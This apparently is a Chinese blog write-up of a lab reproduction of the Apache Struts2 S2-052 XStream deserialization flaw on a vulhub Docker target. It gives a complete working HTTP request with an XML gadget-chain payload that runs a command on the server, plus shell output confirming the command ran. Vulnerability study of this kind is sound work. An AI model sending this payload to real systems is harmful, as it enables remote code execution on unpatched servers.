struts2-052复现

struts2-052复现

原理:

struts REST插件使用XStream组件对XML进行反序列化的操作时,未对数据的内容进行有效的验证,被攻击者进行了RCE的攻击。

复现:

使用vnlhub靶场,打开 /var/local/soft/vulhub-master/struts2/s2-052 文件,

1.拉取环境

1
2
docker-compose up -d 
docker ps

2.登录网站

3.点击Edit时,使用BP进行抓包,发送到重发器中,将GET请求改为POST请求(bp里可以完成)或是使用EXP,注意更改IP地址

4.写入EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
POST /orders/3/edit HTTP/1.1
Host: 192.168.144.198:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.144.198:8080/orders.xhtml
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3DF01827211772BFE045182C989BAFFD
Connection: close
Content-Type: application/xml
Content-Length: 2410

<map>
<entry>
     <jdk.nashorn.internal.objects.NativeString>
       <flags>0</flags>
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         <dataHandler>
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <initialized>false</initialized>
                 <opmode>0</opmode>
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                       <command>
<string>touch</string>
<string>/tmp/test11.txt</string>
                       </command>
                       <redirectErrorStream>false</redirectErrorStream>
                     </next>
                   </iter>
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
                     <method>
                       <class>java.lang.ProcessBuilder</class>
                       <name>start</name>
                       <parameter-types/>
                     </method>
                     <name>foo</name>
                   </filter>
                   <next class="string">foo</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
               <ibuffer/>
               <done>false</done>
               <ostart>0</ostart>
               <ofinish>0</ofinish>
               <closed>false</closed>
             </is>
             <consumed>false</consumed>
           </dataSource>
           <transferFlavors/>
         </dataHandler>
         <dataLen>0</dataLen>
       </value>
     </jdk.nashorn.internal.objects.NativeString>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
   </entry>
   <entry>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   </entry>
 </map>

5.成功使用touch命令写入 test11.txt 文件

1
2
3
4
5
6
7
8
9
10
[root@localhost s2-052]# docker-compose exec struts2 ls /tmp/     
hsperfdata_root  test.txt  test11.txt

[root@localhost s2-052]# docker exec -it 61d8ead3d40a /bin/bash    //进入到docker容器里面
root@61d8ead3d40a:/usr/local/tomcat# ls /tmp
hsperfdata_root  test.txt  test11.txt
root@61d8ead3d40a:/usr/local/tomcat# exit                          //退出容器 (curl + D)
exit
[root@localhost s2-052]#

#漏洞复现 #EXP
struts2-052复现
http://example.com/2025/05/26/struts2-052复现/
作者
XCDH
发布于
2025年5月26日
许可协议